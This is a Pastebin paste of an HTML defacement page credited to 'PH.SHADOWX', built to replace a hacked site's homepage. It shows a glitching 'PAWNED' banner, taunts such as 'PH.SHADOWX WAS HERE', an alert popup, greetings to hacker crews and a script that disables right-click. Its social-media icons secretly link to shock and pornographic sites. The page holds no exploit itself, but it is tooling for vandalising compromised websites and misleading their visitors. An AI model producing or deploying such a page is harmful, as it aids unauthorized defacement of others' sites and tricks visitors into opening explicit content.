Advertisement
Guest User

Glitchy Deface Page By PH.SHADOWX

a guest
Jul 18th, 2018
789
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 8.38 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4.   <!--SCRIPT CODED BY PH.SHADOWX | ©2018-->
  5.  
  6.   <!--Special Mentions :| PureHackers International | Elite Cyber Security | Blood Security Hackers | -->
  7.  
  8.   <!-- Based on http://codepen.io/lbebber/pen/ypgql -->
  9.   <link href="http://necolas.github.io/normalize.css/3.0.2/normalize.css" rel='stylesheet'/>
  10.   <script src="https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js"></script>
  11.   <style>
  12.     /* Just colors and font sizes */
  13.     * {
  14.       font-family: sans-serif;
  15.     }
  16.     body {
  17.       background-color: black;  
  18.     }
  19.    
  20.     .glitch {
  21.       color: white;
  22.       font-size: 100px;
  23.       margin: 0 auto;
  24.       width: 400px;
  25.     }
  26.    
  27.     /* Real glitch effect */
  28.     .glitch {
  29.       position: relative;
  30.     }
  31.    
  32.     .glitch:after {
  33.       animation: glitch-animation 2s infinite linear alternate-reverse;
  34.       background: black;
  35.       clip: rect( 0, 900px, 0, 0 );
  36.       color: white;
  37.       content: attr( data-text );
  38.       left: 2px;
  39.       overflow: hidden;
  40.       position: absolute;
  41.       text-shadow: -1px 0 red;
  42.       top: 0;
  43.     }
  44.     .glitch:before {
  45.       animation: glitch-animation-2 3s infinite linear alternate-reverse;
  46.       background: black;
  47.       clip: rect( 0, 900px, 0, 0 );
  48.       color: white;
  49.       content: attr( data-text );
  50.       left: -2px;
  51.       overflow: hidden;
  52.       position: absolute;
  53.       text-shadow: 1px 0 blue;
  54.       top: 0;
  55.     }
  56.     /* Expanded Animations */
  57.     @keyframes glitch-animation {
  58.       0% {
  59.         clip: rect(42px, 9999px, 44px, 0);
  60.       }
  61.       5% {
  62.         clip: rect(12px, 9999px, 59px, 0);
  63.       }
  64.       10% {
  65.         clip: rect(48px, 9999px, 29px, 0);
  66.       }
  67.       15.0% {
  68.         clip: rect(42px, 9999px, 73px, 0);
  69.       }
  70.       20% {
  71.         clip: rect(63px, 9999px, 27px, 0);
  72.       }
  73.       25% {
  74.         clip: rect(34px, 9999px, 55px, 0);
  75.       }
  76.       30.0% {
  77.         clip: rect(86px, 9999px, 73px, 0);
  78.       }
  79.       35% {
  80.         clip: rect(20px, 9999px, 20px, 0);
  81.       }
  82.       40% {
  83.         clip: rect(26px, 9999px, 60px, 0);
  84.       }
  85.       45% {
  86.         clip: rect(25px, 9999px, 66px, 0);
  87.       }
  88.       50% {
  89.         clip: rect(57px, 9999px, 98px, 0);
  90.       }
  91.       55.0% {
  92.         clip: rect(5px, 9999px, 46px, 0);
  93.       }
  94.       60.0% {
  95.         clip: rect(82px, 9999px, 31px, 0);
  96.       }
  97.       65% {
  98.         clip: rect(54px, 9999px, 27px, 0);
  99.       }
  100.       70% {
  101.         clip: rect(28px, 9999px, 99px, 0);
  102.       }
  103.       75% {
  104.         clip: rect(45px, 9999px, 69px, 0);
  105.       }
  106.       80% {
  107.         clip: rect(23px, 9999px, 85px, 0);
  108.       }
  109.       85.0% {
  110.         clip: rect(54px, 9999px, 84px, 0);
  111.       }
  112.       90% {
  113.         clip: rect(45px, 9999px, 47px, 0);
  114.       }
  115.       95% {
  116.         clip: rect(37px, 9999px, 20px, 0);
  117.       }
  118.       100% {
  119.         clip: rect(4px, 9999px, 91px, 0);
  120.       }
  121.     }
  122.     @keyframes glitch-animation-2 {
  123.       0% {
  124.         clip: rect(65px, 9999px, 100px, 0);
  125.       }
  126.       5% {
  127.         clip: rect(52px, 9999px, 74px, 0);
  128.       }
  129.       10% {
  130.         clip: rect(79px, 9999px, 85px, 0);
  131.       }
  132.       15.0% {
  133.         clip: rect(75px, 9999px, 5px, 0);
  134.       }
  135.       20% {
  136.         clip: rect(67px, 9999px, 61px, 0);
  137.       }
  138.       25% {
  139.         clip: rect(14px, 9999px, 79px, 0);
  140.       }
  141.       30.0% {
  142.         clip: rect(1px, 9999px, 66px, 0);
  143.       }
  144.       35% {
  145.         clip: rect(86px, 9999px, 30px, 0);
  146.       }
  147.       40% {
  148.         clip: rect(23px, 9999px, 98px, 0);
  149.       }
  150.       45% {
  151.         clip: rect(85px, 9999px, 72px, 0);
  152.       }
  153.       50% {
  154.         clip: rect(71px, 9999px, 75px, 0);
  155.       }
  156.       55.0% {
  157.         clip: rect(2px, 9999px, 48px, 0);
  158.       }
  159.       60.0% {
  160.         clip: rect(30px, 9999px, 16px, 0);
  161.       }
  162.       65% {
  163.         clip: rect(59px, 9999px, 50px, 0);
  164.       }
  165.       70% {
  166.         clip: rect(41px, 9999px, 62px, 0);
  167.       }
  168.       75% {
  169.         clip: rect(2px, 9999px, 82px, 0);
  170.       }
  171.       80% {
  172.         clip: rect(47px, 9999px, 73px, 0);
  173.       }
  174.       85.0% {
  175.         clip: rect(3px, 9999px, 27px, 0);
  176.       }
  177.       90% {
  178.         clip: rect(26px, 9999px, 55px, 0);
  179.       }
  180.       95% {
  181.         clip: rect(42px, 9999px, 97px, 0);
  182.       }
  183.       100% {
  184.         clip: rect(38px, 9999px, 49px, 0);
  185.       }
  186.       }
  187.       .sticky-container{
  188.       padding:0px;
  189.       margin:0px;
  190.       position:fixed;
  191.       right:-130px;
  192.       top:300px;
  193.       width:167px;
  194.       z-index: 1100;
  195.       }
  196.       .sticky li{
  197.       list-style-type:none;
  198.       background-color:transparent;
  199.       color:#efefef;
  200.       height:43px;
  201.       padding:0px;
  202.       margin:0px 0px 1px 0px;
  203.       -webkit-transition:all 0.25s ease-in-out;
  204.       -moz-transition:all 0.25s ease-in-out;
  205.       -o-transition:all 0.25s ease-in-out;
  206.       transition:all 0.25s ease-in-out;
  207.       cursor:pointer;
  208.       }
  209.       .sticky li:hover{
  210.       margin-left:-11px;
  211.       }
  212.       .sticky li img{
  213.       float:left;
  214.       margin:5px 4px;
  215.       margin-right:5px;
  216.       }
  217.       .sticky li p{
  218.       padding-top:5px;
  219.       margin:0px;
  220.       line-height:16px;
  221.       font-size:11px;
  222.       }
  223.       .sticky li p a{
  224.       text-decoration:none;
  225.       color:#2C3539;
  226.       }
  227.       .sticky li p a:hover{
  228.       text-decoration:underline;
  229.       }
  230.   </style>
  231.   <title>PH.SHADOWX WAS HERE</title>
  232.   <link href='http://i68.tinypic.com/65si9x.jpg' rel='icon' type='image/x-icon'/>
  233.   <meta name='author' content='Ph.ShadowX'>
  234.   <meta charset="UTF-8">
  235.   <meta property="og:description" content="IS THIS YOU CALLED SECURITY?" />
  236.   <meta property="og:keywords" content="Seized, Stamped, Pawned By PH.SHADOWX" />
  237.   <link href='http://i68.tinypic.com/65si9x.jpg' rel='SHORTCUT ICON'/>
  238.   <link rel="stylesheet" href="http://karyamurid.com/jangandihapus/videoYoutubeBackground/css/normalize.css" media="all">
  239.   <script src="http://karyamurid.com/jangandihapus/videoYoutubeBackground/js/jquery-1.11.1.min.js"></script>
  240.   <script src="http://karyamurid.com/jangandihapus/videoYoutubeBackground/js/device.min.js"></script>
  241.   <script src="http://karyamurid.com/jangandihapus/videoYoutubeBackground/js/jquery.mb.YTPlayer.js"></script>
  242.   <script src="http://karyamurid.com/jangandihapus/videoYoutubeBackground/js/custom.js"></script>
  243. </head>
  244. <body>
  245.   <script>alert("Got Pawned? :D");</script>
  246.   <div class="glitch" data-text="PAWNED">PAWNED</div>
  247.     <a id="bgndVideo" class="player" data-property="{videoURL:'https://www.youtube.com/watch?v=cfhtLRA_Gv8',containment:'body',autoPlay:true, startAt:0, opacity:1}"></a>
  248.   <center><h1><font color="white" /> #PH.SHADOWX WAS HERE</h1></center></font>
  249.   <center><h2><font color="white" /> SECURITY IS JUST AN </font> <font color="red" /> ILLUSION </h2></center></font>
  250.   <br>
  251.   <center><h1><font color="ffffff" /> <-- #PUREHACKERS INTERNATIONAL / ELITE CYBER SECURITY--> </font></h1></center>
  252.   <br>
  253.   <!-- Social -->
  254.   <div class="sticky-container">
  255.       <ul class="sticky">
  256.           <li>          
  257.               <a href="https://www.facebook.com/PureHackers.Sec/" target="_blank"><img src="https://png.icons8.com/color/2x/facebook.png" width="32" height="32">
  258.   </a>
  259.           </li>
  260.           <li>
  261.               <a href="https://meatspin.com" target="_blank"><img src="https://png.icons8.com/color/2x/twitter-squared.png" width="32" height="32">
  262.              </a>
  263.           </li>
  264.           <li>
  265.               <a href="http://www.youjizz.com/" target="_blank"><img src="https://png.icons8.com/color/2x/youtube-play.png" width="32" height="32">
  266.              </a>
  267.           </li>
  268.       </ul>
  269.   </div>
  270.   <center><h3><font color="white" />It's Better To Have A Good Security No More, than fooling Everyone Including Yourselves And Have One</h3></center></font>
  271.   <center><h5><font color="white" /> #NONSENSE IT ONLY MAKES US </font> <font color="red" /> SLOWER </font></h5></center>
  272.   <center><h4><font color="white" /> All Rights Reserved 2018 </font> <font color="red" /> SINCE 2014 </font></h4></center>
  273.   <script type="text/javascript />
  274.   $(document).ready(function () {
  275.        //Disable full page
  276.        $("body").on("contextmenu",function(e){
  277.            return false;
  278.        });
  279.  
  280.        //Disable part of page
  281.        $("#id").on("contextmenu",function(e){
  282.            return false;
  283.        });
  284.    });
  285.    </script>
  286. <!--Special Greetz to : PH.SOL PH.R3D W33B DarkLord.PH XSilver XShadow M4st3rJ30 Gr3ySh4d0w Sp4d3 X-m3n And You :D -->
  287.  
  288. </body>
  289. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement